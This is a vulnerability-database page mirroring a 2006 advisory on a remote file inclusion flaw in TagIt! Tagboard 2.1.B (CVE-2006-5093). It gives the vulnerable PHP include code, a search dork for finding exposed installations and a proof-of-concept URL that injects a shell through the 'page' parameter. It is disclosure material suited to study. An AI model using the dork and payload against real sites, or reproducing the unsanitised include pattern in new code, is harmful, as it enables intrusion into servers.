Lucene search
+L

TagIt! Tagboard 2.1.b b2 - 'index.php' Remote File Inclusion

🗓️ 28 Sep 2006 00:00:00Reported by Kernel-32Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

Remote File Inclusion in Tagmin Control Center 2.1.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-5093
29 Sep 200621:00
cve
cvelist
Cvelist
CVE-2006-5093
29 Sep 200621:00
cvelist
nvd
NVD
CVE-2006-5093
29 Sep 200621:07
nvd
 Tagmin C.C 2.1.B Remote File Include
########################################
+Advisory #3
+Product :Tagmin Control Center 2.1.B
+Develop: http://ds3.bbminc.net/tagit2b/
+Dork: inurl:"/tagit2b/"
+Vulnerable: Remote File Include
+Risk:High
+Discovered:by Kernel-32
+Contact: [email protected]
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################
Vulnerable code:
----------------
if(isset($_GET['load']) && $_GET['load'] == "dtu" or $_GET['load'] == "tag") {
include("$page.php");
}
else {
include("tagviewer.php");
}
?>

---------------
Vulnerable:
http://site/path/index.php?page=shell

# milw0rm.com [2006-09-28]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Sep 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.03566
39